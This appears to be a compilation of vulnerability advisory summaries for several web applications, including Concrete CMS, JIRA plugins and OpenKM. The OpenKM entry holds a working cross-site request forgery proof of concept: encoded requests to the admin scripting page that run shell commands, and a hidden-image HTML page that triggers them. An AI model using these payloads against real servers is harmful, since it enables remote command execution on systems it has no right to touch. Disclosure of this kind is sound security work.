Plogger Photo Gallery is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query. A successful exploit will allow an attacker to compromise the application, to access or modify data, or to exploit latent vulnerabilities in the underlying database.
Attackers can exploit these issues to steal cookie information, execute arbitrary client side script code in the context of browser, upload and execute arbitrary files in the context of the webserver, and launch other attacks.
Concrete CMS is prone to multiple cross-site scripting vulnerabilities, an arbitrary-file-upload vulnerability, and a denial-of-service vulnerability. An attacker may leverage these issues to cause denial-of-service conditions or to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
Concrete CMS is prone to multiple cross-site scripting vulnerabilities because it fails to properly handle user-supplied input. An attacker may leverage these issues to cause denial-of-service conditions or to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
Yandex.Server is prone to a cross-site scripting vulnerability because it fails to sufficiently sanitize user-supplied data. An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and launch other attacks.
Acuity CMS is prone to a directory-traversal vulnerability and an arbitrary-file-upload vulnerability. An attacker can exploit these issues to obtain sensitive information, to upload arbitrary code, and run it in the context of the webserver process.
The FishEye and Crucible plugins for JIRA are prone to an unspecified security vulnerability because they fail to properly handle crafted XML data. Exploiting this issue allows remote attackers to cause denial-of-service conditions or to disclose local sensitive files in the context of an affected application.
OpenKM is prone to a cross-site request-forgery vulnerability. Attackers can exploit this issue to perform certain administrative actions and gain unauthorized access to the affected application. OpenKM 5.1.7 is vulnerable; other versions may also be affected. Login as administrator (having the AdminRole) and call the URL in a different browser window http://www.example.com/OpenKM/admin/scripting.jsp?script=String%5B%5D+cmd+%3D+%7B%22%2Fbin%2Fsh%22%2C+%22-c%22%2C+%22%2Fbin%2Fecho+pwned+%3E+%2Ftmp%2Fpoc%22%7D%3B%0D%0ARuntime.getRuntime%28%29.exec%28cmd%29%3B Alternatively the administrator could browse a prepared HTML page in a new tab <html> <body> <script> img = new Image(); img.src="http://www.example.com/OpenKM/admin/scripting.jsp?script=String%5B%5D+cmd+%3D+%7B%22%2Fbin%2Fsh%22%2C+%22-c%22%2C+%22%2Fbin%2Fecho+pwned+%3E+%2Ftmp%2Fpoc%22%7D%3B%0D%0ARuntime.getRuntime%28%29.exec%28cmd%29%3B" </script> </body> </html> The above exploit does nothing else than just creating a file in /tmp String[] cmd = {"/bin/sh", "-c", "/bin/echo pwned > /tmp/poc"}; Runtime.getRuntime().exec(cmd); Some might also want to browse directories http://www.example.com/OpenKM/admin/scripting.jsp?script=import+java.io.*%3B %0D%0A%0D%0Atry+%7B%0D%0A++++String+ls_str%3B%0D%0A++++Process+ls_proc+%3D+Runtime.getRuntime%28%29.exec%28%22%2Fbin%2Fls+-lah%22%29%3B%0D%0A++++DataInputStream+ls_in+%3D+new+DataInputStream%28ls_proc.getInputStream%28%29%29%3B%0D%0A%0D%0A++++while+%28%28ls_str+%3D+ls_in.readLine%28%29%29+%21%3D+null%29+++++++++++%0D%0A++++++++print%28ls_str+%2B+%22%3Cbr%3E%22%29%3B%0D%0A%0D%0A%7D+catch+%28IOException+e%29+%7B%0D%0A%7D
PHP Address Book is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input. An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
JIRA, and the Gliffy and Tempo plugins for JIRA are prone to a denial-of-service vulnerability because they fail to properly handle crafted XML data. Exploiting this issue allows remote attackers to cause denial-of-service conditions in the context of an affected application.
Services By CQR